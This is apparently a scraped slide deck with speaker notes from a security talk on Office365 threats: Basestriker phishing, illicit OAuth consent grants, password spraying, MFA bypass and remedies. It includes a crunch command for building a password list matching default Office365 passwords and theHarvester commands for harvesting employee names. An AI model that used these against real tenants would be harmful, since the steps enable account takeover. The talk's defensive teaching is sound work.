The document discusses security threats related to Office 365 from a hacker's perspective. It summarizes common ransomware attacks and techniques, such as using the <base> tag to bypass email link protections. It also demonstrates how illicit consent grants could be obtained by tricking users into granting permissions to malicious applications registered in their Azure Active Directory. The speaker advocates for restricting application registrations and consent to applications to help prevent this threat.
2024 DevNexus Patterns for Resiliency: Shuffle shards
Office365 from a hacker's perspective: Real-life Threats, Tactics and Remedies
1. Office365 from a
Hacker’s perspective
Real life threats, tactics and remedies
Twitter: @BenMenesi
http://www.ytria.com/sapio365
2. Speaker
Head of Products at Ytria
Started out in the IBM world (Admin & Developer)
SharePoint & Exchange Admin and Developer
Certified Ethical Hacker v9 and current OSCP student
Enjoys breaking things
Speaker at IT events around the globe on all things
collaboration and security (SPS Toronto, Calgary, Geneva,
Cambridge, Chicago etc…)
Ben Menesi
@BenMenesi
Twitter: @BenMenesi
http://www.ytria.com/sapio365
3. Ytria
Founded in ‘99 in Montreal, Canada
Started in the IBM Software World
500+ customers, 3k orgs, 165 countries
Sapio365 GA Summer of 2018
Who we are
Twitter: @BenMenesi
http://www.ytria.com/sapio365
4. Ytria
Locally installed Administration Client for O365: Users, Groups, Teams, OneDrive & more
PowerShell-less reporting, bulk updates, unparalleled security monitoring.
Free for <50 users, 3 month key for anyone at Omaha SP UG: https://ytria.com/sapio365
What we do: sapio365
Twitter: @BenMenesi
http://www.ytria.com/sapio365
6. Statistics
Some numbers from the field
Verizon’s 2017 & 2018 Data Breach Investigations Report:
https://www.verizondigitalmedia.com/blog/2017/07/2017-verizon-data-
breach-investigations-report/: 53000 incidents & 2216 data breaches
58% Victims are businesses with < 1000 employees (62% in 2017)
92%
68% Breaches took months(!!!) to discover
Twitter: @BenMenesi
http://www.ytria.com/sapio365
Malware vectors: Email. (6.3% Web, 1.3% other)
7. On-Prem. vs. Cloud security
Benefits of your data in the cloud
Broader scope of threat intelligence
Larger and more specialized security muscle than most SMBs
Fast and instant delivery (no manual patching required)
Twitter: @BenMenesi
http://www.ytria.com/sapio365
8. On-Prem. vs. Cloud security
Disadvantages of using cloud services
Vulnerability mitigation out of your control
Your organization is part of a larger attack surface
Less wiggle-room to tailor defenses to your needs
Twitter: @BenMenesi
http://www.ytria.com/sapio365
9. Ransomware
Basestriker attack: gets around Microsoft’s ATP SafeLinks by leveraging the
<base> URL tag.
Practical example
Twitter: @BenMenesi
http://www.ytria.com/sapio365
Traditional way to embed URLs in a phishing email:
Using the <base> tag:
11. Ransomware
A more recent attack: MFA bypass via IMAP
https://www.proofpoint.com/us/threat-insight/post/threat-actors-leverage-
credential-dumps-phishing-and-legacy-email-protocols
Highlights (details discussed later)
100,000 unauthorised login attempts analyzed (December 2018 – onwards)
72% tenants were targeted at least once
40% tenants had at least 1 compromised account
15 of 10,000 active user accounts breached
13. Ransomware attacks
DOJ Statistics: 1000 attacks / day in 2015, 4000 attacks / day in 2017
WannaCry: 150 countries, estimated at $4B
NotPetya: $250-300M for Maersk alone, $1.2B in total revenue
54% of companies experienced one or more successful attacks
Total cost of a successful cyber attack is over $5M or $301 / employee
Why are they so important?
Twitter: @BenMenesi
http://www.ytria.com/sapio365
14. How do they spread?
Ransomware Protection
60% of ransomware attacks come from infected emails BUT:
Also, vulnerable (application) servers
Example: city of Atlanta hit by SamSam (originally discovered in 2016) in 2018
Malware infection likely through SMBv1 open on a web server
Aftermath: $2.6M cost
Conclusion: Update, patch, pay attention
to cyber hygiene!
Twitter: @BenMenesi
http://www.ytria.com/sapio365
15. Cautionary tale: Herrington & Company gets ransomwared
Engages Data Recovery company to retrieve data
DR company quotes $6000 to recover data
Data recovery is WAY too fast
FBI confirms that PDR indeed paid ransom to decrypt victim’s files
https://pbs.twimg.com/media/DbfP0G7WAAEWQIa.jpg:large
How do we prevent ransomware?
Decrypting Ransomware
Ransomware Protection
Twitter: @BenMenesi
http://www.ytria.com/sapio365
16. Microsoft introduced Files Restore
OneDrive
Allows to restore entire OneDrive
account to a previous point in
time within 30 days
Monitors file assets notifies if an
attack is detected
Office365 Ransomware Protection
Ransomware Protection
Twitter: @BenMenesi
http://www.ytria.com/sapio365
17. Careful!
Real time notification might not be as accurate as we think
AXCrypt encryption on OneDrive flies easily under the radar.
Ransomware prevention: have users store important data in OneDrive
Office365 Ransomware Protection
Ransomware Protection
Twitter: @BenMenesi
http://www.ytria.com/sapio365
19. Email Encryption: End-to end
encryption
Prevent Forwarding: Restrict email
recipients from forwarding or copying
emails you send (plus: MS Office docs.
Attached are encrypted even after
downloading)
What happens if the recipient is
outside your organization:
New(ish) advanced email protection options
Email encryption
Twitter: @BenMenesi
http://www.ytria.com/sapio365
21. OME Viewer App. – Now deprecated
iOS mail app didn’t support decrypting messages protected by OME.
Rights restrictions become void (even though if using an Office365 mail
server, forwarding such a mail is still not allowed)
To toggle this: Set-ActiveSyncOrganizationSettings –AllowRMSSupportForUnenlightenedApps <$true|$false>
Note: previously encrypted messages won’t be viewable on IOS
Review what’s new in OME: https://docs.microsoft.com/en-
us/office365/securitycompliance/set-up-new-message-encryption-capabilities
Tip: customize your OME message look and feel: https://support.office.com/en-
us/article/add-your-organizations-brand-to-your-encrypted-messages-
7a29260d-2959-42aa-8916-feceff6ee51d
New advanced email protection options
Email encryption
Twitter: @BenMenesi
http://www.ytria.com/sapio365
22. This one is thanks to Al Hoitingh: https://alberthoitingh.com/2018/12/20/ome-
message-revocation/
Encrypted status means: email & content didn’t leave the perimeter.
You can use Message Trace to locate the outgoing mail and then use powershell
to:
Query the OME status: Get-OMEMessageStatus -MessageID “message id”
Set message as revoked: Set-OMEMessageRevocation -Revoke $true -
MessageID “message id”
Revoking Encrypted Messages
Email encryption
Twitter: @BenMenesi
http://www.ytria.com/sapio365
23. Revoking Encrypted Messages
Email encryption
Twitter: @BenMenesi
http://www.ytria.com/sapio365
Because the data never left perimeter, it’s the ‘link’ that’s broken at the moment of
revocation and recipient will get this:
25. Azure AD applications
In the light of the Facebook Cambridge Analytica scandal, we should take a
look at Azure AD registered applications
Phishing campaigns could trick users into granting access to applications
https://blogs.technet.microsoft.com/office365security/defending-
against-illicit-consent-grants/
Exploit first demonstrated by Kevin Mitnick
Illicit Consent Grants
Twitter: @BenMenesi
http://www.ytria.com/sapio365
26. Azure AD applications
Demo
Infrastructure:
Exploit Scenario
Twitter: @BenMenesi
http://www.ytria.com/sapio365
User Apache Web
Server
Hacker
27. Azure AD applications
Infrastructure – bit more detail (Thanks to Albert Hoitingh)
Exploit Scenario
29. Azure AD applications
User receives a legit
looking email:
Exploit Scenario
Twitter: @BenMenesi
http://www.ytria.com/sapio365
30. Azure AD applications
Picks account to authenticate
Exploit Scenario
Twitter: @BenMenesi
http://www.ytria.com/sapio365
31. Azure AD applications
Presented with permissions that need
consent (and they make sense)
Exploit Scenario
Twitter: @BenMenesi
http://www.ytria.com/sapio365
32. Azure AD applications
All mails encrypted
… and this is just one of many outcome possibilities
Exploit Scenario
Twitter: @BenMenesi
http://www.ytria.com/sapio365
33. Azure AD applications
Why build integrated applications?
Using various APIs, you can grant apps access to your tenant data:
Mail, calendars, contacts, conversations
Users, groups, files and folders
SharePoint sites, lists, list items
OneDrive items, permissions and more
Integration: Azure AD provides secure sign-in and authorization
Developer registers the application with Azure AD
Assign permissions to the application
Tenant administrator / user must consent to permissions
Introduction – Digital #metoo era: Consent is key!
Twitter: @BenMenesi
http://www.ytria.com/sapio365
34. Azure AD applications
Who can register applications in your tenant?
By default: any member! This can be a security issue
Keep in mind: there is a record of what data was shared with which
application. Also: when user adds / allows application to access
their data, event can be audited (Audit reports)
See more: https://docs.microsoft.com/en-us/azure/active-
directory/develop/active-directory-how-applications-are-added#who-
has-permission-to-add-applications-to-my-azure-ad-instance
Registering the application
Twitter: @BenMenesi
http://www.ytria.com/sapio365
35. Azure AD applications
Endpoint v1: Azure AD Admin center (aad.portal.azure.com) > Enterprise
Applications > New Application
Azure AD Endpoints: Endpoint 1
Twitter: @BenMenesi
http://www.ytria.com/sapio365
36. Azure AD applications
Endpoint v1 properties
Only supports 1 platform / application
Supports ALL
APIs
Static permissions
Azure AD Endpoints: Endpoint 1
Twitter: @BenMenesi
http://www.ytria.com/sapio365
37. Azure AD applications
Endpoint v2 properties (apps.dev.Microsoft.com)
Supports multiple platforms
Only supports Graph API
Scopes vs. Resources (dynamic
permissions)
Strategic new direction for Microsoft
Gotcha: v1 and v2 aren’t compatible!
Azure AD Endpoints: Endpoint 2
Twitter: @BenMenesi
http://www.ytria.com/sapio365
38. Azure AD applications
What you’ll need
Application Name
Registering the application
Twitter: @BenMenesi
http://www.ytria.com/sapio365
39. Azure AD applications
What you’ll need
Application Name
Application password
Registering the application
Twitter: @BenMenesi
http://www.ytria.com/sapio365
40. Azure AD applications
What you’ll need
Application Name
Application password
Platform
Redirect URL(s)
Registering the application
Twitter: @BenMenesi
http://www.ytria.com/sapio365
41. Azure AD applications
What you’ll need
Application Name
Application password
Platform
Redirect URL(s)
Owner(s)
Permissions
Delegated
Application
Registering the application
Twitter: @BenMenesi
http://www.ytria.com/sapio365
42. Azure AD applications
Azure AD v1. endpoint permissions (delegated only): 87
Azure AD v2. endpoint permissions
Delegated: 77
Application: 39
Permissions
Twitter: @BenMenesi
http://www.ytria.com/sapio365
43. Azure AD applications
Application will access and do stuff on your behalf: consent required
Two types of consent:
User can consent (limited scope actions, delegated permissions only)
Admin must consent (larger scope actions, some delegated, all
application permissions)
Consent
Twitter: @BenMenesi
http://www.ytria.com/sapio365
45. Azure AD applications
How does it work?
User consents to permissions required by the app
Application asks for authorization from the Azure AD
Azure AD makes the user sign in and returns code to application
Application uses code to retrieve JWT bearer token to use resource
(Microsoft Graph API)
Keep in mind: JWT doesn’t authenticate, only authorizes!
Hijacking the JWT token is extremely dangerous
Authorization flow
Twitter: @BenMenesi
http://www.ytria.com/sapio365
46. Azure AD applications
How do you prevent illicit consent grants
Application Registration & consent restrictions
Regular application & permission enumeration
Cloud App Security
Educate users
Twitter: @BenMenesi
http://www.ytria.com/sapio365
47. Azure AD applications
Azure Portal > Azure Active Directory > User settings
Remedy: Restricting app registrations
Twitter: @BenMenesi
http://www.ytria.com/sapio365
48. Azure AD applications
Azure Portal > Azure Active Directory > User settings
Remedy: Restricting consent grants
Twitter: @BenMenesi
http://www.ytria.com/sapio365
49. Azure AD applications
While we’re at it…
Simple users are by default allowed to access the Azure AD
Administration portal allowing them to view:
All users’ group memberships
All users’ assigned licenses and enabled services
All users’ directory roles (find global administrator accounts)
Best to disable this: Azure Active Directory > User Settings >
Administration Portal
Remedy: Restricting consent & app registrations
Twitter: @BenMenesi
http://www.ytria.com/sapio365
50. Azure AD applications
Enumerating applications using PowerShell:
Install the AzureAD PowerShell module
Launch PowerShell ISE as an Administrator and:
Install-Module AzureAD
Connect to Azure AD:
Connect-AzureAD
Use PowerShell script:
https://gist.github.com/psignoret/41793f8c6211d2df5051d77ca3728c09
Example:
.Get-AzureADPSPermissions.ps1 | Export-Csv -Path "permissions.csv" -
NoTypeInformation
Remedy: Enumerating apps and permissions
Twitter: @BenMenesi
http://www.ytria.com/sapio365
51. Azure AD applications
What you get:
Remedy: Enumerating apps and permissions
Twitter: @BenMenesi
http://www.ytria.com/sapio365
52. Azure AD applications
Gotcha: won’t show redirect URLs!
To get Apps and Redirect URLs: Get-AzureRmADApplication
Requires AzureRM.Resources and Connect-AzureRMADAccount:
Remedy: Enumerating apps and permissions
Twitter: @BenMenesi
http://www.ytria.com/sapio365
53. Azure AD applications
Use “consent” string to filter:
Remedy: Searching your Audit Logs
Twitter: @BenMenesi
http://www.ytria.com/sapio365
54. Azure AD applications
Create an OAUTH App Security Policy
Remedy: Cloud App Security
Twitter: @BenMenesi
http://www.ytria.com/sapio365
58. Brute force attacks
In the news in August 2017: sophisticated and coordinated attack against 48
Office365 customers
Brute Force attack unique: targeting multiple cloud providers
100,000 failed login attempts from 67 Ips and 12 networks over 7 months
Slow and low to avoid intrusion detection
Users see unsuccessful login attempts using name up to 17 name variations
Passwords likely the same (password spray attack)
https://www.tripwire.com/state-of-security/featured/new-type-brute-force-attack-
office-365-accounts/
Brute forcing office365 logins
Twitter: @BenMenesi
http://www.ytria.com/sapio365
59. Brute force attacks
Demo
How hard is it to acquire the right login names?
Twitter: @BenMenesi
http://www.ytria.com/sapio365
60. Brute force attacks
Before this Tuesday (02/04/2019):
10 unsuccessful attempts: captcha
Another 10: lockout (10 mins)
In reality: 10 tries = lockout
No customization allowed
Account Lockout in Office365
Twitter: @BenMenesi
http://www.ytria.com/sapio365
61. Brute force attacks
As of Tuesday 02/04/2019 – WOOHOO!
https://techcommunity.microsoft.com/t5/Azure-Active-Directory-
Identity/Azure-AD-Password-Protection-is-now-generally-available/ba-
p/377487#.XKYVYnSP8eU.twitter
Account Lockout in Office365
Twitter: @BenMenesi
http://www.ytria.com/sapio365
62. Authentication
Multi Factor Authentication
Focus: cloud only -> Azure Active Directory MFA
Grants access to users with a password / PIN / Security Token / Device /
DNA information.
Free support for MFA on Office365 apps.
Interesting story:
What could’ve stopped all this? MFA
Twitter: @BenMenesi
http://www.ytria.com/sapio365
63. Authentication
MFA: true story
I’ll just put this here…
Thanks to @RachelTobac for this gem:
https://goo.gl/CFcA5t
Twitter: @BenMenesi
http://www.ytria.com/sapio365
64. Authentication
MFA – true story
Good news: management through
the app is better
Twitter: @BenMenesi
http://www.ytria.com/sapio365
65. Authentication
MFA – the elephant in the room
2 serious outages in 2018 alone.
Twitter: @BenMenesi
http://www.ytria.com/sapio365
66. Authentication
MFA – in case of emergencies
Consider implementing a break glass account (via Exclusions from Baseline
MFA policy): https://practical365.com/security/multi-factor-authentication-
default-for-admins/
Azure AD Portal > Conditional Access
Twitter: @BenMenesi
http://www.ytria.com/sapio365
67. Authentication
The way around MFA
Recent breaches discovered by Proofpoint
https://www.proofpoint.com/us/threat-insight/post/threat-actors-
leverage-credential-dumps-phishing-and-legacy-email-protocols
Essentially: Using IMAP to get around MFA by mimicking legacy email clients
Twitter: @BenMenesi
http://www.ytria.com/sapio365
68. Authentication
The way around MFA
Microsoft’s response: https://docs.microsoft.com/en-us/microsoft-
365/enterprise/secure-email-recommended-policies
Require MFA
Block clients that don’t support modern auth.
App Passwords
Twitter: @BenMenesi
http://www.ytria.com/sapio365
69. Attack Simulation
Available as part of Threat Intelligence (available in Office365 Enterprise E5)
Follows logical penetration testing steps
You must be a global administrator or member of the Security Admin group in
the Security & Compliance Center AND have MFA enabled on your account.
What does it allow you to do?
Requirements
Multi Factor Authentication must be enabled
Attack simulations must be set up
The all new Office365 Attack Simulator
Spear Phishing Campaigns
Password Brute-Force
Attacks
Password Spray Attacks
Twitter: @BenMenesi
http://www.ytria.com/sapio365
70. Attack Simulation
Where to find it: protection.office.com / Threat Management
The all new Office365 Attack Simulator
Twitter: @BenMenesi
http://www.ytria.com/sapio365
71. Attack Simulation
Only works for individual users (no groups for now)
Tip: target users identified as top targeted in the Threat Management
dashboard
Tip2: You’ll need to enable Office Analytics
Spear Phishing campaigns
Twitter: @BenMenesi
http://www.ytria.com/sapio365
72. Attack Simulation
User tries logs in to phishing site
Redirected to awareness page
Spear Phishing campaigns
Twitter: @BenMenesi
http://www.ytria.com/sapio365
73. Attack Simulation
Tip: best to use your own phishing sites, google already flagged most of them.
Spear Phishing campaigns
Twitter: @BenMenesi
http://www.ytria.com/sapio365
74. Attack Simulation
Use a pre-set word list against one or multiple user accounts
Uses the same method an attacker would
I mean literally: watch out! Currently this locks out the user
account.
Only supports very limited password lists (Internal server error at 10k
passwords)
Best online resources for common credentials:
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Com
mon-Credentials
Brute Force Password
Twitter: @BenMenesi
http://www.ytria.com/sapio365
75. Attack Simulation
Tries one or a few passwords against all accounts
Story: known password against two accounts
Both accounts DID have that password
Why?
Gotcha: second user had MFA enabled, which doesn’t appear to be
supported.
Password Spray Attack
Twitter: @BenMenesi
http://www.ytria.com/sapio365
76. Threat Tracker
Tracks major malware campaigns (WannaCry, Petya, etc)
Let’s you track the impact of these campaigns in your tenant
Generally available in office365 – Security & Complicance
Twitter: @BenMenesi
http://www.ytria.com/sapio365
77. Office365 passwords
Current (4th April 2019) password format isn’t hard to guess:
Tip: make sure to have users modify their passwords on first login
About generating random passwords
Twitter: @BenMenesi
http://www.ytria.com/sapio365
79. Office365 passwords
Pretty easy to create a password list for brute-force:
Using crunch: crunch 8 8 aeiou BCDFGHJKLMNPQRSTVWXYZ
0123456789 bcdfghjklmnpqrstvwxyz –t ,@^%%%%%
File size: only ~ 1GB
Guessing random passwords
Twitter: @BenMenesi
http://www.ytria.com/sapio365
80. Office365 passwords
Simulate attacks against your own environment
Keep an eye out for more attack simulation tools
Use your own phishing tactics and word lists
Educate users on strong passwords
Conclusion
Twitter: @BenMenesi
http://www.ytria.com/sapio365
81. Check out sapio365
Twitter: @BenMenesi
http://www.ytria.com/sapio365
Download sapio365 (free for 3 months): www.ytria.com/sapio365
And let’s see what that last point means via an example
… for cloud security weaknesses
Normally using MS ATP: goes to a safe Ms domain url
https://www.avanan.com/resources/basestriker-vulnerability-office-365
… for cloud security weaknesses
To research: is this really not fixed yet?
https://www.avanan.com/resources/basestriker-vulnerability-office-365
Took 14 days
… for cloud security weaknesses
To research: is this really not fixed yet?
https://www.avanan.com/resources/basestriker-vulnerability-office-365
Took 14 days
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
https://www.scmagazine.com/microsoft-adds-ransomware-protection-recovery-tools-to-office-365/article/756577/
To look into: Versioning?
Try axcrypt on my data! Does o365 notice this?
Keep in mind: ransomware won’t jus tencrypt onedrive but everything else, too!
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
https://www.microsoft.com/en-us/microsoft-365/blog/2018/04/05/defend-yourself-from-cybercrime-with-new-office-365-capabilities/
This needs to be enabled!
https://support.office.com/en-us/article/set-up-new-office-365-message-encryption-capabilities-built-on-top-of-azure-information-protection-7ff0c040-b25c-4378-9904-b1b50210d00e
https://support.office.com/en-us/article/office-365-message-encryption-ome-f87cb016-7876-4317-ae3c-9169b311ff8aMention: OneDrive sharing
https://support.office.com/en-us/article/manage-office-365-message-encryption-09f6737e-f03f-4bc8-8281-e46d24ee2a74
However it works in the outlook app?
https://support.office.com/en-us/article/manage-office-365-message-encryption-09f6737e-f03f-4bc8-8281-e46d24ee2a74
However it works in the outlook app?
https://support.office.com/en-us/article/manage-office-365-message-encryption-09f6737e-f03f-4bc8-8281-e46d24ee2a74
However it works in the outlook app?
[Needs more work]: Mail flow rules https://support.office.com/en-us/article/define-mail-flow-rules-to-encrypt-email-messages-in-office-365-9b7daf19-d5f2-415b-bc43-a0f5f4a585e8
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
We feel pretty good about o365 applications right? We’re not facebook. Wrong!
Set guilbon to listen Copy code from consent post and show guilbon get token in postmanhttps://graph.microsoft.com/v1.0/sites?search=*https://graph.microsoft.com/v1.0/users
Set guilbon to listen Copy code from consent post and show guilbon get token in postmanhttps://graph.microsoft.com/v1.0/sites?search=*https://graph.microsoft.com/v1.0/users
Set guilbon to listen Copy code from consent post and show guilbon get token in postmanhttps://graph.microsoft.com/v1.0/sites?search=*https://graph.microsoft.com/v1.0/users
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Let’s first understand Azure AD Applications. They are cool.
Historically this is an improvement:
Applications have been able to leverage Windows Server Active Directory for user authentication for many years without requiring the application to be registered or recorded in the directory.Now, admins aren’t needed necessarily which removed workload. - Permissions: some require admin. But still, simple user consentible stuff is very powerful!
Redirect URL: where the authentication response is sent.
Needed for authentication
Platforms:
Let’s talk about permissions
Historically this is an improvement:
Applications have been able to leverage Windows Server Active Directory for user authentication for many years without requiring the application to be registered or recorded in the directory.Now, admins aren’t needed necessarily which removed workload. - Permissions: some require admin. But still, simple user consentible stuff is very powerful!
Consent Link + more research on service principal and how this stuff really works
Consent Link + more research on service principal and how this stuff really works
Consent Link + more research on service principal and how this stuff really works
Consent Link + more research on service principal and how this stuff really works
Consent Link + more research on service principal and how this stuff really works
Do I want this slide?
Demo on phishing email. Plus what they could do.
Historically this is an improvement:
Applications have been able to leverage Windows Server Active Directory for user authentication for many years without requiring the application to be registered or recorded in the directory.Now, admins aren’t needed necessarily which removed workload. - Permissions: some require admin. But still, simple user consentible stuff is very powerful!
Historically this is an improvement:
Applications have been able to leverage Windows Server Active Directory for user authentication for many years without requiring the application to be registered or recorded in the directory.Now, admins aren’t needed necessarily which removed workload. - Permissions: some require admin. But still, simple user consentible stuff is very powerful!
- To look into: prevent users from consenting?
Historically this is an improvement:
Applications have been able to leverage Windows Server Active Directory for user authentication for many years without requiring the application to be registered or recorded in the directory.Now, admins aren’t needed necessarily which removed workload. - Permissions: some require admin. But still, simple user consentible stuff is very powerful!
- To look into: prevent users from consenting?
AAD portal: need to know (aad.portal.azure.com)
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Need graphics for what happened
Need graphics for what happened
Need graphics for what happened
Need graphics for what happened
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Theharvester –d ytria.com –b google
Theharvester –d ytria.com –b linkedin and then |cut –d”-” –f1 > emplyees.txt
Maybe work on the login names from –b linkedin to create a list of stuff matching email format from –b google?
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
- To see if I have the time for a cool pic / story on this
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
- To see if I have the time for a cool pic / story on this
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
- To see if I have the time for a cool pic / story on this
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
- To see if I have the time for a cool pic / story on this
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
- To see if I have the time for a cool pic / story on this
Have you set up MFA yet? I’m not going to spend a LOT of time on this but let’s be sure to cover it
- To see if I have the time for a cool pic / story on this
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
To add: Screnshots AND where is this stuff? (Threat management)
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
To add: Screnshots AND where is this stuff? (Threat management)
Only a matter of time: payroll stuff has already been flagged by google.
If I was really a malicious actor, I’d take a closer look at those sites..
Do I maybe talk about more here? Slide needs more meat
Have you set up MFA yet?
While password wasn’t accepted, MFA wasn’t triggered. Means that the method they use to do this uses the same method to log in through AAD but does not support MFA
https://rcpmag.com/articles/2018/06/01/microsoft-threat-tracker-office-365-security.aspx
To add screenshot and more explanation
Have you set up MFA yet?
First letter always caps, second and third always lowercase.
First letter always caps, second and third always lowercase.
First letter always caps, second and third always lowercase.
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/
Ransomware protection: https://thehackernews.com/2018/04/microsoft-office-ransomware.html
Ransomweare and office365: https://spanning.com/blog/need-know-ransomware-attacks-office-365/